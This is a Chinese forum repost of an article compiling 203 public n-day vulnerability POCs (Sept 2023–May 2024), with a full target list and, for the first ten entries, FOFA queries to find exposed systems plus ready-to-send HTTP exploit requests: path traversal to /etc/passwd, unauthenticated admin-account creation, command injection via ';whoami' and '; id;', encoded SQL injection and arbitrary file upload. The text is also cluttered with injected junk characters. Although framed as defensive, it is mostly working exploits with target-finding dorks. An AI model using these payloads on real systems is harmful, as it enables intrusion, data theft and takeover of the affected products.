找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1549|回复: 0

互联网公开漏洞整理202309-202406--转载

[复制链接]
发表于 2024-6-5 14:31:29 | 显示全部楼层 |阅读模式
互联网公开漏洞整理202309-202406( v  r0 e' l2 A; b3 ]
道一安全 2024-06-05 07:41 北京; X" b5 L, X6 G1 {2 p" O
以下文章来源于网络安全新视界 ,作者网络安全新视界* n% o7 u; }7 E
8 h* a. r4 \9 j. B! H9 u" E
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。% A% I4 {/ @* a: t0 K$ b

8 i$ W. Q# D! r; A/ Y$ F漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。9 r. |- e7 i1 D$ s; \3 m1 s! `/ D7 S/ C

: P4 o  v- [/ Y, b安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
- [! }( O# L0 I- N& I9 Z" @; Z' D; w" e; U0 _/ y
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。2 h) N" _' [! @* j9 T

6 w$ I* h5 e' |7 m- D( d) [( R% b合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。) Q% z" U7 F3 S7 }
5 {* ~4 Q9 x  ~* a
2 R/ _- Z. g& |! S5 D4 y
声明0 |# _, ?3 Q& w( D+ m2 h- E0 j

! m( k6 y& l9 q' t7 u为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。! Q3 T, ?1 [9 e* h7 ]
# i, [4 ^8 h0 N8 T2 E
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。/ q- f$ r, K/ H+ @
& F1 z; y) K" T8 @& e% h6 ]$ u3 L+ t0 e
5 S/ W# h  T4 w& ^! @+ O5 |
- b7 L& t* P' p  v
目录; u. k: j7 _+ R' m) s  v' f/ N

9 b0 h8 f5 x$ @3 a/ W018 _$ c8 |) X  D& x/ u+ h' [
# K8 a9 j* f1 J' _
1. StarRocks MPP数据库未授权访问* \8 r( c2 r$ S# S
2. Casdoor系统static任意文件读取
5 q; u  I& S3 z/ r/ e( N& ]3. EasyCVR智能边缘网关 userlist 信息泄漏0 Z3 A! e; U3 q4 \8 U8 m
4. EasyCVR视频管理平台存在任意用户添加0 I) ~8 a5 m& R
5. NUUO NVR 视频存储管理设备远程命令执行5 w% N3 e7 \3 D- ^
6. 深信服 NGAF 任意文件读取
' {0 f. V# Q6 S+ @  W" _0 ^7. 鸿运主动安全监控云平台任意文件下载5 y' w5 e$ ?4 L, {
8. 斐讯 Phicomm 路由器RCE) d1 L1 G2 C: O# P$ n' p
9. 稻壳CMS keyword 未授权SQL注入8 W9 |7 X; u! P
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传" {% P$ W" z& j; J+ V! |5 v
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
* W1 T; b8 c/ ], }' S% n12. Jorani < 1.0.2 远程命令执行
/ J0 @3 K5 ?. P2 K* L6 v13. 红帆iOffice ioFileDown任意文件读取
' l" k6 U3 y( [) D9 S/ O8 t14. 华夏ERP(jshERP)敏感信息泄露  B! Z4 N5 `& `* f/ E1 O
15. 华夏ERP getAllList信息泄露$ [. _0 `' u) j2 `. I9 p
16. 红帆HFOffice医微云SQL注入9 }7 W" b$ h( a" g. q" _
17. 大华 DSS itcBulletin SQL 注入- P4 f9 E* y* z6 i0 C9 Z) U/ `, S  r
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
: [0 n5 i2 q6 g$ ]4 X0 e+ _% H19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入/ p& F7 t" j% b7 _& y
20. 大华ICC智能物联综合管理平台任意文件读取
9 b" Z4 n7 Z. H21. 大华ICC智能物联综合管理平台random远程代码执行6 O8 n$ i2 `4 I- @
22. 大华ICC智能物联综合管理平台 log4j远程代码执行2 Y; A8 t. y! o
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
. Z4 `4 B0 t$ a24. 用友NC 6.5 accept.jsp任意文件上传
; v  B3 V0 U- N25. 用友NC registerServlet JNDI 远程代码执行
% A5 o2 o5 E0 Z7 A3 g; i8 ]26. 用友NC linkVoucher SQL注入
" |4 P: h% K$ u6 y27. 用友 NC showcontent SQL注入- j& g- [6 K1 _2 G
28. 用友NC grouptemplet 任意文件上传
/ F0 v4 ^/ k/ c  `9 M( t! A29. 用友NC down/bill SQL注入7 f* f- S' D/ Y3 ^$ c7 n: a% ~
30. 用友NC importPml SQL注入1 j/ l) @* N0 m2 l. ^& U
31. 用友NC runStateServlet SQL注入
* J4 X) d/ q' O# l% P' Q5 u8 p( Z! ~' ]: Q32. 用友NC complainbilldetail SQL注入
3 P6 [2 O) |+ ]. I0 {33. 用友NC downTax/download SQL注入, t5 m! a" ?6 q1 g. E, E% t7 Y
34. 用友NC warningDetailInfo接口SQL注入8 l. H4 F* N) j" j; m. o
35. 用友NC-Cloud importhttpscer任意文件上传* l2 E( l0 C2 S6 i' S3 @3 K. v
36. 用友NC-Cloud soapFormat XXE6 F- a  C. ]. B& k
37. 用友NC-Cloud IUpdateService XXE/ u) ^3 p6 z' G/ t2 O& x" L0 W$ C
38. 用友U8 Cloud smartweb2.RPC.d XXE; }; c. Q" W1 m5 V
39. 用友U8 Cloud RegisterServlet SQL注入
0 j- K& l+ ~. R+ p40. 用友U8-Cloud XChangeServlet XXE
; ^: _0 K4 Z% g+ {9 {# A41. 用友U8 Cloud MeasureQueryByToolAction SQL注入. H. M' a1 s6 A( Z, D
42. 用友GRP-U8 SmartUpload01 文件上传# j- O3 ]. V$ ]/ E2 H; L
43. 用友GRP-U8 userInfoWeb SQL注入致RCE4 m0 x, q! t5 i) f% v+ e% m
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
) e5 w1 M8 y/ W4 X& L) g2 j# U45. 用友GRP-U8 ufgovbank XXE% w! f) ]  p, j2 |$ U
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
& A5 s5 o& @! B$ H+ T47. 用友GRP A++Cloud 政府财务云 任意文件读取
8 s2 q1 l7 p) x" d2 V* F! H0 h1 d48. 用友U8 CRM swfupload 任意文件上传
8 A9 {( p& T3 N) q49. 用友U8 CRM系统uploadfile.php接口任意文件上传5 C6 X3 @$ W( q2 L7 g% H
50. QDocs Smart School 6.4.1 filterRecords SQL注入
! d/ `7 R3 u$ F4 M2 n51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入8 B: v* w! O0 B; O) r
52. 泛微E-Office json_common.php sql注入- N3 k. j- b* ^
53. 迪普 DPTech VPN Service 任意文件上传
$ o5 |' U- }5 ^$ F54. 畅捷通T+ getstorewarehousebystore 远程代码执行
  o" P# V: v7 a3 R: X55. 畅捷通T+ getdecallusers信息泄露: O! D( n; i& T: t! {! Q0 P  ?1 a
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE/ G5 C6 l0 \# q$ b
57. 畅捷通T+ keyEdit.aspx SQL注入& g6 M# ]: G, T0 `% V
58. 畅捷通T+ KeyInfoList.aspx sql注入7 m. ~1 i; e' O( u4 K: {6 M$ j, ^
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
4 i' O- \1 V* E  P60. 百卓Smart管理平台 importexport.php SQL注入" n5 E, l& {- \- t; G. T
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传9 u' b$ a& h; y' }+ q# P; q
62. IP-guard WebServer 远程命令执行) }6 F5 @, A* F8 V6 v2 [) n* _3 l
63. IP-guard WebServer任意文件读取
( S& z6 x6 c( S; }2 W1 G64. 捷诚管理信息系统CWSFinanceCommon SQL注入
) ?* _& r4 j( J) @( t1 O: t- V+ @65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过6 `* s1 Y9 r; d/ b) Z( N
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入* H2 O3 t. a" k, ~
67. 万户ezOFFICE wpsservlet任意文件上传
& m: o0 W; L; S8 J3 ]2 s3 E2 \4 Z68. 万户ezOFFICE wf_printnum.jsp SQL注入
% n9 D: Q2 x3 z9 f( \69. 万户 ezOFFICE contract_gd.jsp SQL注入3 ~6 G2 C6 z# j4 _6 Q: q& H- Y
70. 万户ezEIP success 命令执行
( ]- Z. n" }) k71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入! T6 \8 l# P( A4 w* M
72. 致远OA getAjaxDataServlet XXE
3 n6 s9 M/ V+ k7 ^% J% ^& f1 w0 P73. GeoServer wms远程代码执行% f4 B2 ^7 _9 |5 }4 w; I9 N% U
74. 致远M3-server 6_1sp1 反序列化RCE( i+ T/ y6 V' t. g4 c
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE3 j1 K5 I  a# B0 f  c
76. 新开普掌上校园服务管理平台service.action远程命令执行
8 d5 {0 b% _5 M2 Y- g6 P6 U77. F22服装管理软件系统UploadHandler.ashx任意文件上传9 W( b4 K  \: V$ a. E% F; x. O
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传) N. y0 J$ \( l& ?0 V
79. BYTEVALUE 百为流控路由器远程命令执行, B8 G6 q3 H2 P* K  v+ |, y
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传2 H, Q" \4 P  w" ~. u! y" ~1 k
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
, ~; g* s8 K9 T& U4 w1 S7 P82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行' Y7 C. h% j9 L$ o1 V
83. JeecgBoot testConnection 远程命令执行
% f( x0 }& H1 k' r" D: G# Y84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
# E& B2 [, ?' ?" G+ {2 _& u85. SysAid On-premise< 23.3.36远程代码执行+ F& ?- l7 w! k* O( }  ^$ D, g$ X3 }
86. 日本tosei自助洗衣机RCE
5 t: n) j+ f* O9 H) F87. 安恒明御安全网关aaa_local_web_preview文件上传
) u* E7 ]: a+ j9 P. I4 D88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
! F7 |2 q# G- E6 P8 e  D89. 致远互联FE协作办公平台editflow_manager存在sql注入! S3 M( A' ]9 C  U4 m
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行6 m/ b# N3 V  A4 R3 H
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
* ?1 p6 O! Y- w1 v# e+ h) A/ U0 u92. 海康威视运行管理中心session命令执行+ h: D+ i2 w' I
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传5 a$ H6 l5 o5 B% v( j8 C
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传9 }$ F! Y+ a# C* v- s
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
" W- L/ e/ ^/ J$ l% ]# W* b96. Apache OFBiz  18.12.11 groovy 远程代码执行! I0 q1 |4 L4 t& \) a8 L! }& U
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
% ]6 c7 A% p- b) L" G5 `5 Y( V+ Z98. SpiderFlow爬虫平台远程命令执行9 A0 Z7 ~/ m, D/ p# ~
99. Ncast盈可视高清智能录播系统busiFacade RCE
" s* C* M; N5 {, ?5 v  H( B# U100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传/ }3 Z7 M* ^6 }5 W9 E5 X
101. ivanti policy secure-22.6命令注入3 H. c: \" j' [: ]! }' i. b" o
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行3 A( s1 p) `2 @0 n+ N
103. Ivanti Pulse Connect Secure VPN XXE
# }$ z& c6 R" ], i% R3 l; l) l104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
4 S) ?$ W, _: t9 H105. SpringBlade v3.2.0 export-user SQL 注入
" y7 k/ k* W+ ?/ g106. SpringBlade dict-biz/list SQL 注入/ v( V+ z3 \: f! K
107. SpringBlade tenant/list SQL 注入) i6 r% h7 P" z8 }. L1 `. [' k+ o
108. D-Tale 3.9.0 SSRF
; J" O7 W- n9 S% f109. Jenkins CLI 任意文件读取& J& N$ y4 r# u5 r
110. Goanywhere MFT 未授权创建管理员
, s* @2 H) Z' I( x111. WordPress Plugin HTML5 Video Player SQL注入3 K2 I/ c8 g/ O* Q) b6 Z# x
112. WordPress Plugin NotificationX SQL 注入8 F0 Y" i0 m- u8 T" l" a/ a
113. WordPress Automatic 插件任意文件下载和SSRF7 A8 }. N- D( X& O: T' a
114. WordPress MasterStudy LMS插件 SQL注入- e: v2 ~4 U. V. t* w; ~
115. WordPress Bricks Builder <= 1.9.6 RCE
3 b9 d8 {2 U4 g2 c9 J6 U116. wordpress js-support-ticket文件上传# ?9 u. v/ o0 L/ b- y
117. WordPress LayerSlider插件SQL注入
- k" W! r0 C+ K" B- {& `4 E! D118. 北京百绰智能S210管理平台uploadfile.php任意文件上传5 m# _( F8 T+ J+ U! a( }
119. 北京百绰智能S20后台sysmanageajax.php sql注入
9 S2 R/ {" e* [5 U( x7 d2 \1 V120. 北京百绰智能S40管理平台导入web.php任意文件上传, B, m$ g, J4 [- i2 J: N
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
1 ~) ]) m) i# n1 x122. 北京百绰智能s200管理平台/importexport.php sql注入
* x- R3 P- W5 M" {123. Atlassian Confluence 模板注入代码执行
+ f: w) l- H0 |/ U4 g124. 湖南建研工程质量检测系统任意文件上传
9 l1 C, Q7 ~9 }# G# m. ~125. ConnectWise ScreenConnect身份验证绕过# B+ n( h; M4 i8 K9 J1 e3 ?: A
126. Aiohttp 路径遍历8 n6 r  w9 l7 E5 X, B8 _8 a5 I3 J) N
127. 广联达Linkworks DataExchange.ashx XXE
, |. D" T: W4 U* S" G; y128. Adobe ColdFusion 反序列化% T' u/ i' V7 J5 k
129. Adobe ColdFusion 任意文件读取) x+ O5 f3 m2 O7 b  o& [; t: F8 J
130. Laykefu客服系统任意文件上传/ C2 t9 a0 [# d' N* G# m
131. Mini-Tmall <=20231017 SQL注入
' M# D- t; ^7 O+ C2 w" E132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
8 h  y& Q& a, R! x# q133. H5 云商城 file.php 文件上传$ B# w, \3 [. @4 g
134. 网康NS-ASG应用安全网关index.php sql注入
" \* B2 \0 v" K135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入0 s. R' C3 }* ^# S( G
136. NextChat cors SSRF
& L6 W1 b2 X. J( A137. 福建科立迅通信指挥调度平台down_file.php sql注入" X  a# t! k1 f, f4 C
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入% |! V3 i6 T# [
139. 福建科立讯通信指挥调度平台editemedia.php sql注入6 e) S" F' g. V& R1 U0 B
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入0 D6 u$ ]' u" R- y
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入$ W8 j7 T" x5 a) V$ z6 P9 r* E
142. CMSV6车辆监控平台系统中存在弱密码" R# I! ]* f, h+ s4 k. ^1 y
143. Netis WF2780 v2.1.40144 远程命令执行5 i. w8 i/ M: @: W2 @8 J" w' q
144. D-Link nas_sharing.cgi 命令注入7 X* B6 [# [9 H9 L8 v% m- m
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
2 Y, N0 o2 C4 ?146. MajorDoMo thumb.php 未授权远程代码执行- k+ S- n5 ~; y1 {
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
  r* ?$ U+ U; q! g148. CrushFTP 认证绕过模板注入8 y9 i5 }" v" R- v3 T- u5 }
149. AJ-Report开源数据大屏存在远程命令执行
3 V: d# l# h  O3 _2 [& \& M150. AJ-Report 1.4.0 认证绕过与远程代码执行
3 F+ A8 R7 N0 U  W! ~  {7 i! e151. AJ-Report 1.4.1 pageList sql注入9 ]9 P- [9 h+ ^- U6 t0 x
152. Progress Kemp LoadMaster 远程命令执行0 @+ D5 l0 j) c, F; B
153. gradio任意文件读取- I" F( h0 B/ Q8 F. I* z
154. 天维尔消防救援作战调度平台 SQL注入/ K) c9 }: l  k8 e; T! `) r
155. 六零导航页 file.php 任意文件上传7 ~" y5 t! H, o6 q" h
156. TBK DVR-4104/DVR-4216 操作系统命令注入0 {1 Z6 E9 E( B4 I) Z$ K
157. 美特CRM upload.jsp 任意文件上传
( y" U) u) c/ M+ O158. Mura-CMS-processAsyncObject存在SQL注入' W  j' O, W9 S! _1 t0 g! h
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传4 x# k9 `( n- \1 F
160. Sonatype Nexus Repository 3目录遍历与文件读取/ {$ Z" l# h6 z" m
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
+ h# |) y/ d% u% b$ [8 J9 C162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传9 `5 v* b0 X, y% J2 t; v( ^
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传. g) \# Q/ z4 e6 t7 n5 _: Y
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传3 D+ w0 C* ~& w; s/ z! W
165. OrangeHRM 3.3.3 SQL 注入
7 O8 ]: S2 A) z6 e2 e166. 中成科信票务管理平台SeatMapHandler SQL注入
& _, \, r% r. g167. 精益价值管理系统 DownLoad.aspx任意文件读取. l* L6 X' d+ X
168. 宏景EHR OutputCode 任意文件读取
5 f! h, }$ B4 L/ l2 D169. 宏景EHR downlawbase SQL注入7 ~8 h% l& t, D
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
6 L8 ?; y# L' _6 ~171. 通天星CMSV6车载定位监控平台 SQL注入
  v% U- o6 R/ p/ N, l172. DT-高清车牌识别摄像机任意文件读取" N' P, S9 z$ Z% R# t* y! N
173. Check Point 安全网关任意文件读取! W3 R2 b8 C0 {$ @/ k# A( ]/ q
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
$ x; R7 D! c# m: Q* \# x175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入" J) t5 _5 c. u& z* V' T) k
176. 电信网关配置管理系统 rewrite.php 文件上传
+ r' }; X0 Q( [4 N) [177. H3C路由器敏感信息泄露
% J1 {$ g. _/ E2 E178. H3C校园网自助服务系统-flexfileupload-任意文件上传
# o$ p! @8 R7 k& k8 H* E179. 建文工程管理系统存在任意文件读取7 b7 F% w6 f3 p0 L. o
180. 帮管客 CRM jiliyu SQL注入
5 e, K4 S" i- z# G: W# x5 u) |181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入8 w) e& h* I8 D0 T
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建6 g" K9 c. Z, B) O8 l1 n5 }
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入9 v( G7 P  @* `. \+ z: y+ a
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
- T( N) s+ \( @' C185. 瑞友天翼应用虚拟化系统SQL注入
( Z/ J' l$ H& P7 X  I7 P9 M" Q186. F-logic DataCube3 SQL注入' C/ r: J- r) T5 f& Z/ A
187. Mura CMS processAsyncObject SQL注入
; K: O5 L8 S- l% W% ]9 c$ ]188. 叁体-佳会视频会议 attachment 任意文件读取9 {: ]! x3 h* o5 S" Y" {
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
0 ?& h! f  p# u% ?2 K' ]" H0 R190. 短视频矩阵营销系统 poihuoqu 任意文件读取/ X( [; q, S+ j) o, f: S
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
/ M; U1 k; s) v* `+ f192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
/ `8 d" X0 s$ z9 F# Y  s! t193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行7 i. Y, U2 k( H$ \; G( X# C
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
: t% [3 N+ [, w/ Y& y195. 飞鱼星上网行为管理系统 send_order.cgi命令执行6 |+ m6 b0 n) `. a
196. 河南省风速科技统一认证平台密码重置
* }; C  E9 p/ c, I$ c197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入# S6 }. C: Q4 w. o" ?0 P" I1 t6 p' P
198.  阿里云盘 WebDAV 命令注入9 b3 A# L: w' L6 O. |9 E# x5 `5 C8 L9 d: Q
199. cockpit系统assetsmanager_upload接口 文件上传# X/ u% V" z1 S9 ^7 @1 P
200. SeaCMS海洋影视管理系统dmku SQL注入8 E, _: G% {9 j+ l
201. 方正全媒体新闻采编系统 binary SQL注入1 f/ i$ K# l' Q
202. 微擎系统 AccountEdit任意文件上传
+ {  {1 z* C+ k7 ]' Q5 _7 X203. 红海云EHR PtFjk 文件上传( |! N9 _/ x5 t- `1 C) n7 M- I

( A" z- D0 ?$ n5 yPOC列表
' n; z" c6 q" z6 v- x, x4 I/ D% u" E7 p
02- e+ e+ \0 [! f8 c+ _

4 |9 M; S3 R* v9 O0 m; ^# n+ q! F1. StarRocks MPP数据库未授权访问/ s7 R( @3 L2 ^$ f* N6 p8 n
FOFA :title="StarRocks"9 Z  q. Z/ g* K# A+ V% T
GET /mem_tracker HTTP/1.10 [( ~2 z* m1 Z! P5 d' H% Y8 W  M
Host: URL$ F2 L9 l5 [/ y: y
2 ]! J4 p( G; C7 |0 i% `
' \: ]; z' u3 n0 L& P9 p
2. Casdoor系统static任意文件读取
' n8 e$ z5 A4 Y) ?% AFOFA :title="Casdoor"' o" }3 V3 T- y% t; ~7 z
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.16 g8 e) c+ k& {4 ~2 H
Host: xx.xx.xx.xx:9999/ e$ S1 Y$ D0 d  A7 @/ s: g3 }
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4 s2 {( F$ r( z& k" J) EConnection: close
' ^- o( i/ K; _2 g! I' ?Accept: */*
+ [! v/ {9 l, N8 q7 }& b4 EAccept-Language: en
6 L. j9 ]) f- d: C# oAccept-Encoding: gzip
8 |$ o7 r' [& j2 g
: ~6 a9 h$ j( l* e0 B  L! f9 E" `2 L! Z8 E9 ^, i' M9 R
3. EasyCVR智能边缘网关 userlist 信息泄漏
7 T6 r: ]  O0 C. E+ mFOFA :title="EasyCVR"3 w* d6 M9 w4 z. A8 z1 y
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
6 c, a" g) X0 m& ?* i+ `7 `Host: xx.xx.xx.xx
6 B7 n" K( q. W; a7 v4 L3 o6 B& Z1 w

0 g% X6 r* m5 f( R: S* A4. EasyCVR视频管理平台存在任意用户添加
& u9 ^6 m+ R5 {; kFOFA :title="EasyCVR"9 [6 Y+ Q& N) c) e2 |' `, F8 H: L: U( \
$ |# \- @" T& z6 g8 W. g
password更改为自己的密码md5
4 S8 h; o- W" s/ Q# C1 IPOST /api/v1/adduser HTTP/1.1+ r# ~9 r& K5 D1 e; z) A
Host: your-ip
& n1 G7 j+ l1 ~+ @5 \" Q" {* R8 SContent-Type: application/x-www-form-urlencoded; charset=UTF-8
8 Y% {! @, b$ U; h# h! X1 V7 z4 D: _* X- C  k$ [
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1( q* j% J$ J5 W/ ]
$ \' D+ j, [5 A( u" F
- d% Y. B- x7 N
5. NUUO NVR 视频存储管理设备远程命令执行9 s- t7 _: E( Z. S) r2 Z/ e0 P
FOFA:title="Network Video Recorder Login"0 t+ v5 b% P1 C! B+ D" r. N* x
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
* Q: k. r5 X5 \Host: xx.xx.xx.xx/ P8 q. B3 ?* R2 M% }
8 V2 V+ F: k( _  g
' K3 |; r* ~* B5 w2 Q8 L8 i  K
6. 深信服 NGAF 任意文件读取* P0 `  s8 t/ U* G
FOFA:title="SANGFOR | NGAF"
* |3 B5 C% ?4 qGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
( N- M  F1 W7 m0 @8 c% nHost:
7 a# p% e/ j8 z8 x' D: T: \5 L% i
9 e  N, J$ W) Q6 n+ E1 b3 n  T  P) E5 t' v4 B3 F% @! |
7. 鸿运主动安全监控云平台任意文件下载
0 C) b/ C5 K+ }; KFOFA:body="./open/webApi.html"
$ C+ J; B8 |* fGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
/ K" J! g. W6 N& V1 M- [Host:; D% V! H+ O+ O4 Q

, I( j$ Q5 ~3 C0 \* q
! M; X9 G6 S- H5 d; B6 A0 T4 a8. 斐讯 Phicomm 路由器RCE
/ U. G: M* Q$ EFOFA:icon_hash="-1344736688", x% E$ ~+ b: F3 h0 e: S8 W
默认账号admin登录后台后,执行操作$ {- {# b: x# N- s3 m, v2 z
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
% F4 y7 z: o8 a% k" u. a+ JHost: x.x.x.x
4 Q% i$ Z. v1 W" BCookie: sysauth=第一步登录获取的cookie2 i* `, F+ X6 g' s3 }: k4 \0 h$ Y
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz. t' j% M- H! [4 {: r4 q1 K4 [; B9 ^' u" c
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
8 O1 H+ E/ ~. G' [3 m- {# b. t0 e# Y2 C1 ?+ ~( d
------WebKitFormBoundaryxbgjoytz; N: Y2 y; t; O6 e
Content-Disposition: form-data; name="wifiRebootEnablestatus"5 o; _# j  O2 o9 N, T4 y8 o

- `  l) D6 _+ ^3 \0 _%s5 v- r2 b+ Q. C% D& e4 Z
------WebKitFormBoundaryxbgjoytz
' C0 K, X$ c2 N# iContent-Disposition: form-data; name="wifiRebootrange"
. d( c' A3 s9 z  _- [. R" s
7 c; @% ^2 J- b+ b& `) x12:00; id;
% Y* i* J* ?4 v2 ~------WebKitFormBoundaryxbgjoytz
" ^1 V- o$ O6 ?Content-Disposition: form-data; name="wifiRebootendrange"
8 A& T% l( c, ]* v3 p
( Q* A: s# h! V, P%s:3 ?; r2 B8 ]4 @$ h
------WebKitFormBoundaryxbgjoytz
7 c$ H+ ^4 z0 a1 Q9 L- a) vContent-Disposition: form-data; name="cururl2", k2 L4 q% ]1 C6 R" b$ f2 t
9 ^# F" g+ q: [2 V' f) V8 r" c3 }
  y% G4 b1 Y9 J6 E# n1 F5 g
------WebKitFormBoundaryxbgjoytz--- X& S$ @. F- E! v

: [' B3 D3 G- X% }4 u, S0 I4 a0 c
1 A0 D* X# u/ R. Q9. 稻壳CMS keyword 未授权SQL注入* B- X  }, Y: z; a
FOFA:app="Doccms"; |- l) B+ M( p+ \. S  u- i
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.13 y8 s9 E* J3 b( G( }
Host: x.x.x.x
" ~3 V0 e: D" n, _
; ~/ [7 _/ ]3 K2 D$ R( d2 L5 ^  ?) c* K- K  s* V9 `5 F
payload为下列语句的二次Url编码
4 @- ~+ X& k  N% o- ?. S# @, v9 w4 M- \
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
7 a( u8 |/ q4 ?5 \$ W! ^9 y
( _9 [) }; g+ n+ I1 q6 Z10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
# K; Q% B2 J1 i9 H  J) dFOFA:icon_hash="953405444"
, }3 L# ?" Q1 J9 I$ h( y0 ]1 i" x1 F) D- X" [
文件上传后响应中包含上传文件的路径6 z( C8 C, g8 T4 \& m* |" A
POST /eis/service/api.aspx?action=saveImg HTTP/1.1; z8 w! e2 c. a! V5 H7 _* X/ Q
Host: x.x.x.x:xx8 T9 a% M3 A. i. y% }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36- z) t6 Z& o! P% v1 X
Content-Length: 197+ X: X  X8 W# V# }( F; y! y  {" m- A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.92 P, J7 K* h4 `) |* C7 V8 {
Accept-Encoding: gzip, deflate# f+ z# f% ?( X
Accept-Language: zh-CN,zh;q=0.9
0 v" d" ^% Q# Z& WConnection: close& S' Y" \: ^* L- J- z
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
, m3 j7 u- o. Z% ?- o' d+ @' {2 c0 T" E
------WebKitFormBoundaryxdgaqmqu
2 Y5 q5 w3 ]& l3 v. Q- hContent-Disposition: form-data; name="file"filename="icfitnya.txt"
' C1 J& V7 D  N1 }) S" a" EContent-Type: text/html1 y* K- D% R, ~1 w* t
6 ^1 ~7 q2 N% k0 ~8 ~- I; T
jmnqjfdsupxgfidopeixbgsxbf
